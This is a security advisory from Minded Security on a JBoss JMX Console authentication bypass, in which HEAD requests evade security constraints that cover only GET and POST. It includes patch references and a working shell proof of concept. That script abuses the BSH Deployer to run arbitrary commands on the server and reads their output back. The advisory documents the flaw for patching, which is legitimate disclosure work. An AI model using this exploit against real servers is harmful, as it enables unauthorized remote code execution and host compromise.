MSA030409

JMX Console Authentication Bypass via Verb Tampering


Tested Versions:
JMX Console - All Versions

Tested OS:
Linux, Solaris, Windows

Minded Security ReferenceID:
MSA030409

Credits:
Discovered by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_] mindedsecurity.com

Contribution in Exploitation:
Giorgio Fedon of Minded Security
giorgio.fedon [_at_] mindedsecurity.com

Reference:
http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-...

Severity:
High: Jmx Console is often exposed to the internet or reachable by abusing
other vulnerabilities. This issue can lead to remote host compromise.

Solution:
A solution to this issue is already available.
See the following RedHat advisories:

https://rhn.redhat.com/errata/RHSA-2010-0376.html
https://rhn.redhat.com/errata/RHSA-2010-0377.html
https://rhn.redhat.com/errata/RHSA-2010-0378.html
https://rhn.redhat.com/errata/RHSA-2010-0379.html

Summary
Minded Security Consultants discovered during a penetration testing activity that JMX Console authentication can be bypassed.
This issue will lead to remote code execution if BSH deployer or other administrative modules are available in the console panel.

Analysis

JMX Console can be secured (protected by password) using the security configuration available in:

jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml

This is the suggested security configuration also available in Jboss official security guidelines ("White Paper on JMX Security"):

https://jira.jboss.org/jira/browse/SECURITY-31


The suggested configuration for protecting the JMX Console is the following one:


<security-constraint>
<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows users with
the role JBossAdmin to access the HTML JMX console web application
</description>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>JBossAdmin</role-name>
</auth-constraint>
</security-constraint>


From the configuration above, security restrictions are enabled only for "GET" and "POST" methods. Any other HTTP method supported by the server will be not restricted.

By issuing a request with the "HEAD" method is possible to invoke directly, with "JBossAdmin" privilege, any functionality implemented by the jmx-console without valid credentials. Note: If JMX console replies with a HTTP 500 error the request has been correctly processed.

The following proof of concept ("jboss-shell.sh") was written by Minded Security consultants to execute arbitrary commands on the remote host through the "BSH Deployer" component of the JMX Console.
The command output gets redirected temporarily on JBOSS server status for a couple of seconds.

Remote "Jboss-shell.sh" Proof of Concept
Note: The following script should be modifies to meet your environment configuration

AA=$1
COM_=`php -r '$arg=$argv[1];for($i=0;$i<strlen($arg);$i++) {printf("%%%02x",ord($arg[$i]));}echo "\n";' 'import java.io.*;
import java.net.*;
String[] s=new String[] {"/bin/sh","-c","'"$AA"'"};
Process p = Runtime.getRuntime().exec(s);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String e=dis.readLine();
String message=e;
while(e!=null){
e= dis.readLine();
message+="|"+e;
}
String mess = message.replaceAll(" ","+").replaceAll("#","%23");
URL u = new URL("http://jbossserver:8080/jmx-console/HtmlAdaptor?ac...;
HttpURLConnection con = (HttpURLConnection) u.openConnection ();
con.setDoInput(true);
con.setRequestProperty("Cookie","MODIFY ME IF NEEDED");
con.setRequestMethod("HEAD");
con.connect();
con.getResponseMessage();
con.disconnect();'`
HOSTPATH="http://jbossserver:8080";
curl -s "$HOSTPATH/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aservice%3DBSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=$COM_&argType=java.lang.String&arg1=soap" -g -X HEAD -H "Cookie:MODIFY ME IF NEEDED" &
sleep 1
curl "$HOSTPATH/status?full=true" -s -g -H "Cookie:MODIFY ME IF NEEDED" | grep 'null|.*|null' -o|perl -i -pe 's/\|/\n/g'

Disclosure Timeline
03/04/2009 Issue found
06/03/2010 Reported to Vendor


Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information.

In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

Any use of this information is at the user's own risk. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of Minded Security Research Lab. If you wish to reprint the whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com for permission.



Copyright (c) 2010 Minded Security, S.r.l..
All rights reserved worldwide.